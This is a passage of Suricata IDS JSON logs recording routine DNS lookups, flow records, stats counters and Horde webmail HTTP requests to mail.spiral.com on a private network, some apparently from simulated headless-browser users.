:3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":89242,"memcap":0}}} {"timestamp":"2020-02-29T00:08:11.005418+0000","flow_id":503484692486814,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:03:10.449182+0000","end":"2020-02-29T00:03:10.451143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:11.108345+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:08:13.158140+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34766,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17865,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:16.284764+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":0}} {"timestamp":"2020-02-29T00:08:17.000297+0000","flow_id":285025491706982,"event_type":"flow","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1058,"start":"2020-02-29T00:07:11.418918+0000","end":"2020-02-29T00:07:16.615880+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:08:18.000294+0000","event_type":"stats","stats":{"uptime":14150,"capture":{"kernel_packets":134019,"kernel_drops":0},"decoder":{"pkts":134025,"bytes":92636252,"invalid":183,"ipv4":132560,"ipv6":8,"ethernet":134025,"raw":0,"null":0,"sll":0,"tcp":127404,"udp":4958,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2722,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2738,"synack":2729,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1764,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2262,"failed_udp":110},"tx":{"http":4560,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2340}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2313,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":37501,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:20.380494+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:21.001904+0000","flow_id":97464254789635,"event_type":"flow","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:20.456707+0000","end":"2020-02-29T00:03:20.562100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:25.000275+0000","event_type":"stats","stats":{"uptime":14157,"capture":{"kernel_packets":134030,"kernel_drops":0},"decoder":{"pkts":134037,"bytes":92638832,"invalid":183,"ipv4":132572,"ipv6":8,"ethernet":134037,"raw":0,"null":0,"sll":0,"tcp":127414,"udp":4960,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2723,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2739,"synack":2730,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1765,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":
0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2263,"failed_udp":110},"tx":{"http":4561,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2341}},"flow_mgr":{"closed_pruned":2703,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19841,"memcap_state":0,"memcap_global":0},"http":{"memuse":76699,"memcap":0}}} {"timestamp":"2020-02-29T00:08:25.579747+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:08:26.000572+0000","flow_id":1214181537235511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1227,"bytes_toclient":6723,"start":"2020-02-29T00:07:20.213559+0000","end":"2020-02-29T00:07:25.402051+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:08:26.322012+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35129,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:26.514026+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618}} {"timestamp":"2020-02-29T00:08:26.884224+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65193,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:27.011353+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65194,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:31.518716+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34775,"tx_id":0}} {"timestamp":"2020-02-29T00:08:32.000293+0000","event_type":"stats","stats":{"uptime":14164,"capture":{"kernel_packets":134072,"kernel_drops":0},"decoder":{"pkts":134077,"bytes":92653227,"invalid":184,"ipv4":132612,"ipv6":8,"ethernet":134077,"raw":0,"null":0,"sll":0,"tcp":127447,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":71338,"memc
ap":0}}} {"timestamp":"2020-02-29T00:08:33.000196+0000","flow_id":282835044059291,"event_type":"flow","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:32.247963+0000","end":"2020-02-29T00:03:32.359559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:38.305553+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18336,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:39.000204+0000","event_type":"stats","stats":{"uptime":14171,"capture":{"kernel_packets":134077,"kernel_drops":0},"decoder":{"pkts":134081,"bytes":92653443,"invalid":184,"ipv4":132614,"ipv6":8,"ethernet":134081,"raw":0,"null":0,"sll":0,"tcp":127449,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":41799,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:40.000530+0000","flow_id":1337983970224512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":2799,"bytes_toclient":7443,"start":"2020-02-29T00:07:30.108928+0000","end":"2020-02-29T00:07:39.863656+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:43.465641+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:44.000493+0000","flow_id":322507671114127,"event_type":"flow","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":24,"bytes_toserver":2313,"bytes_toclient":23216,"start":"2020-02-29T00:07:08.037263+0000","end":"2020-02-29T00:07:43.801338+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:46.000206+0000","event_type":"stats","stats":{"uptime":14178,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2705,"new_pruned":15,"est_pruned":2315,"by
